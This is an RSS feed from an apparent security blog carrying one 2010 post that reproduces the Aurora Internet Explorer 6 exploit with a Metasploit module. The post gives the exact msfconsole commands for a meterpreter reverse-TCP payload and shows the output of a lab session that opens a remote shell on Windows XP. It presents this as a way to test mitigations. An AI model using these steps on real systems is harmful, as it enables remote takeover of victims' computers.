<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Think Security &#187; exploit</title>
	<atom:link href="http://think-security.com/tag/exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://think-security.com</link>
	<description>Information Security Resources and IT Professional Services</description>
	<lastBuildDate>Mon, 25 Jul 2011 10:48:18 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Reproducing the Aurora IE Exploit</title>
		<link>http://think-security.com/reproducing-the-aurora-ie-exploit/</link>
		<comments>http://think-security.com/reproducing-the-aurora-ie-exploit/#comments</comments>
		<pubDate>Sat, 16 Jan 2010 02:45:06 +0000</pubDate>
		<dc:creator>gmoskov</dc:creator>
				<category><![CDATA[Pentest Articles]]></category>
		<category><![CDATA[Aurora]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[IE 6]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[metasploit 3.2]]></category>
		<category><![CDATA[metasploit meterpreter]]></category>
		<category><![CDATA[metasploit project]]></category>
		<category><![CDATA[metasploit ubuntu]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[msfpayload]]></category>
		<category><![CDATA[port 445 exploit]]></category>
		<category><![CDATA[winautopwn]]></category>
		<category><![CDATA[winautopwn download]]></category>

		<guid isPermaLink="false">http://think-security.org/?p=48</guid>
		<description><![CDATA[Yesterday, a copy of the unpatched Internet Explorer exploit used in the <a href="http://www.wired.com/threatlevel/2010/01/hack-of-adob/comment-page-1/">Aurora</a> attacks was uploaded to <a href="http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&#38;type=js">Wepawet</a>. Since the code is now public, the guys from <a href="http://www.metasploit.com/">Metasploit</a> have ported it to a module in order to provide a safe way to test your workarounds and mitigation efforts. <span style="color:#777"> . . . &#8594; Read More: <a href="http://think-security.com/reproducing-the-aurora-ie-exploit/">Reproducing the Aurora IE Exploit</a></span>]]></description>
			<content:encoded><![CDATA[<p>Yesterday, a copy of the unpatched Internet Explorer exploit used in the <a href="http://www.wired.com/threatlevel/2010/01/hack-of-adob/comment-page-1/">Aurora</a> attacks was uploaded to <a href="http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&amp;type=js">Wepawet</a>. Since the code is now public, the guys from <a href="http://www.metasploit.com/">Metasploit</a> have ported it to a module in order to provide a safe way to test your workarounds and mitigation efforts. Note that this only works for IE6, just like the original exploit code.</p>
<p>To get started, grab the <a href="http://www.metasploit.com/framework/download/">latest copy</a> of the <a href="http://www.metasploit.com/">Metasploit Framework</a> and use the <a href="http://www.metasploit.com/redmine/projects/framework/wiki/Updating">online update</a> feature to sync latest exploits from the development tree. Start the <a href="http://www.metasploit.com/">Metasploit</a> Console (msfconsole) and enter the commands in bold:</p>
<p>msf &gt; <strong>use exploit/windows/browser/ie_aurora</strong><br />
msf exploit(ie_aurora) &gt; <strong>set PAYLOAD windows/meterpreter/reverse_tcp</strong><br />
msf exploit(ie_aurora) &gt; <strong>set LHOST </strong> (your IP)<br />
msf exploit(ie_aurora) &gt; <strong>set URIPATH /</strong><br />
msf exploit(ie_aurora) &gt; <strong>exploit</strong></p>
<p>[*] Exploit running as background job.<br />
[*] Started reverse handler on port 4444<br />
[*] Local IP: http://192.168.0.131:8080/<br />
[*] Server started.</p>
<p>msf exploit(ie_aurora) &gt;</p>
<p>Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:</p>
<p>[*] Sending stage (723456 bytes)<br />
[*] Meterpreter session 1 opened (192.168.0.131:4444 -&gt; 192.168.0.126:1514)</p>
<p>msf exploit(ie_aurora) &gt; <strong>sessions -i 1</strong><br />
[*] Starting interaction with 1&#8230;</p>
<p>meterpreter &gt; <strong>getuid</strong><br />
Server username: WINXPDeveloper</p>
<p>meterpreter &gt; <strong>use espia</strong><br />
Loading extension espia&#8230;success.</p>
<p>meterpreter &gt; <strong>shell</strong><br />
Process 892 created.<br />
Channel 1 created.<br />
Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.</p>
<p>C:Documents and SettingsDeveloperDesktop&gt;</p>
<p>Source: <a href="http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html">Metasploit Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://think-security.com/reproducing-the-aurora-ie-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

